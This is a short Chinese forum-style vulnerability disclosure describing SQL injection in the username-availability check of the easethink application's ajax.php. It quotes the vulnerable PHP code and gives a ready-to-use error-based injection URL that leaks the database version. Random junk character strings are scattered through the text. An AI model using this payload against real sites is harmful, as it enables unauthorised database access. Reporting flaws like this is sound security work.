在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。( q8 W; {, v( N" T
4 w; \" M2 V: f' P+ Y5 o ( \! h* q6 v2 }, z) G
! r$ X. D& f Y7 |
* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'','data'=>''); //用于返回的数据 if(trim($user_data['user_name'])==''&&$field_name=='user_name') { $field_item['field_name'] = 'user_name'; $field_item['error'] = EMPTY_ERROR; $res['status'] = 0; $res['data'] = $field_item; return $res; } if($field_name=='user_name'&&$GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."user where user_name = '".trim($user_data['user_name'])."' and id <> ".intval($user_data['id']))>0)//这里的$user_data['user_name']的值就是用户名提交过来的值,这里只是过滤了空格。所有存在SQL注入漏洞。 { $field_item['field_name'] = 'user_name'; $field_item['error'] = EXIST_ERROR; $res['status'] = 0; $res['data'] = $field_item; return $res; } K' M% B, v! D! n
7 w. Z+ S# ]- B, ~! P4 f3 r- y, O* ?2 e0 R j+ v5 t$ ?5 n
5 ~# Q7 R( ?3 z' f( ^' ?0 {Exp:
8 I" h4 H, A* P, k6 S' B7 i! e2 ?2 \& G }- y' i ^
! V" a2 D% q& }* L( m( M4 u4 t* h# o9 K6 b/ [7 y% ^
http://192.168.9.109/easethink_f ... ame&field_data=**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
; f V) M! m" y' l: S4 m
0 w. L$ {- ^3 a- c/ ? |